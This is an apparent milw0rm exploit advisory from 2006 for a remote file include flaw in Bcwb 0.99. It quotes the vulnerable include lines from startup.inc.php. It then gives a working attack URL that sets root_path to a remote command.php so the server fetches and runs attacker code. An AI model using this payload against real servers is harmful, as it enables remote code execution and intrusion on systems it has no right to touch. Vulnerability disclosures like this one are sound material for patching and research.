38 lines
No EOL
780 B
Text
38 lines
No EOL
780 B
Text
*******************************************************************************
|
|
# Title : Bcwb 0.99(root_path)Remote File Include Vulnerability
|
|
|
|
# Author : ajann
|
|
|
|
# Greetz : shadow and Suskun for host : )
|
|
|
|
# Exploit;
|
|
|
|
*******************************************************************************
|
|
[File]
|
|
startup.inc.php
|
|
[/File]
|
|
|
|
[Code,1]
|
|
startup.inc.php Error:
|
|
|
|
|
|
..
|
|
....
|
|
// Debug services
|
|
include($root_path.'include/startup/debug.inc.php');
|
|
include($root_path.'include/startup/common_functions.inc.php');
|
|
include($root_path.'include/lib/data.lib.php');
|
|
....
|
|
..
|
|
|
|
Key [:] root_path=http://target.com/command.php?
|
|
|
|
\Example:
|
|
|
|
http://target.com/include/startup.inc.php?root_path=http://target.com/command.php?
|
|
|
|
# ajann,Turkey
|
|
# ...
|
|
# Im not Hacker!
|
|
|
|
# milw0rm.com [2006-09-19] |